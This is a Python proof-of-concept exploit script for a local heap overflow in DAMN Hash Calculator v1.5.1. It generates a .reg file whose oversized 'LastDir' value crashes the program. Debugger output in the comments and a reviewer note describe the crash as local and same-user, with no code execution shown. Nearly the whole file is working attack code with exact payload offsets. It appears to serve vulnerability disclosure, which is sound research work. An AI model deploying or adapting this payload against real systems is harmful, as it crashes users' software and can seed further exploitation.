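#!/usr/bin/python
# Exploit Title: DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
# Version: 1.5.1
# Date: 2012-02-21
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.google.com
# Tested on: Windows XP SP3 Professional German
# Notes: Old but nice software...just to prove it's there :-)
# Howto: Import Reg -> Start App -> Select File -> Cancel without choosing one
#
# Impact (reviewer note): this script only demonstrates a crash. The faulting
# instruction below reads a byte through EAX, which at that point holds
# 0x42424245 -- the little-endian reading of the "EBBB" marker planted in the
# payload -- while EIP is inside ntdll (presumably heap-block header checks,
# given the TEST CL,1 / TEST CL,8 that follow). No control of EIP is shown
# here, and the trigger requires importing the .reg file into the victim's own
# HKEY_CURRENT_USER hive, so treat it as a local, same-user crash PoC until a
# controlled write or code-execution path is demonstrated.
#
#7C9204E6 . 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
#7C9204E9 . 0B47 10 OR EAX,DWORD PTR DS:[EDI+10]
#7C9204EC . A9 00000269 TEST EAX,69020000
#7C9204F1 . 0F85 8BA70300 JNZ ntdll.7C95AC82
#7C9204F7 > 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
#7C9204FA . 8A48 FD MOV CL,BYTE PTR DS:[EAX-3] <-- Crash
#7C9204FD . 83C0 F8 ADD EAX,-8
#7C920500 . F6C1 01 TEST CL,1
#7C920503 . 56 PUSH ESI
#7C920504 . 0F84 92A70300 JE ntdll.7C95AC9C
#7C92050A . F6C1 08 TEST CL,8
#7C92050D . 0F85 B3A70300 JNZ ntdll.7C95ACC6
#
#EAX 42424245
#ECX 00000008
#EDX 77C31AE8 msvcrt.77C31AE8
#EBX 0040F2F0 DAMN_Has.0040F2F0
#ESP 0012F54C
#EBP 0012F550
#ESI 0041A2DC ASCII "EBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#EDI 00330000
#EIP 7C9204FA ntdll.7C9204FA

# Output path, relative to the current working directory. The name is kept as
# `file` for compatibility with the original script; it shadows the Python 2
# builtin of the same name, which nothing here uses.
file = "poc.reg"

# Payload for the "LastDir" string value: 392 filler bytes, the 4-byte marker
# that the register dump above shows landing in EAX (0x42424245) at the crash,
# then 50 more filler bytes. Offsets are specific to the tested build.
junk1 = "\x41" * 392
boom = "\x45\x42\x42\x42"
junk2 = "\x43" * 50


def build_poc():
    """Return the text of the .reg file that plants the oversized LastDir value.

    The registry key path is written with doubled backslashes so the literal
    backslashes are guaranteed regardless of escape handling: "\\S", "\\D"
    and "\\H" are not valid Python escapes, and newer interpreters warn on
    them. The output has no trailing newline, matching the original PoC.
    """
    lines = [
        "Windows Registry Editor Version 5.00",
        "",
        "[HKEY_CURRENT_USER\\Software\\DAMN\\Hash Calculator\\Settings]",
        '"LastDir"="' + junk1 + boom + junk2 + '"',
    ]
    return "\n".join(lines)


poc = build_poc()


def write_poc(path=file):
    """Write the PoC registry file to *path* and return *path*.

    Raises IOError/OSError if the file cannot be created; the caller decides
    how to report it.
    """
    # Text mode on purpose: on Windows this yields CRLF line endings, which is
    # what the original script produced when run there.
    with open(path, "w") as fh:
        fh.write(poc)
    return path


def main():
    """Create the .reg file in the current directory; return a process exit code."""
    print("[*] Creating exploit file...\n")
    try:
        write_poc()
    except (IOError, OSError) as exc:
        # Only file-system errors are expected here; a bare `except:` would
        # also swallow KeyboardInterrupt and hide programming errors.
        print("[!] Error while creating file! (%s)" % exc)
        return 1
    print("[*] File successfully created!")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())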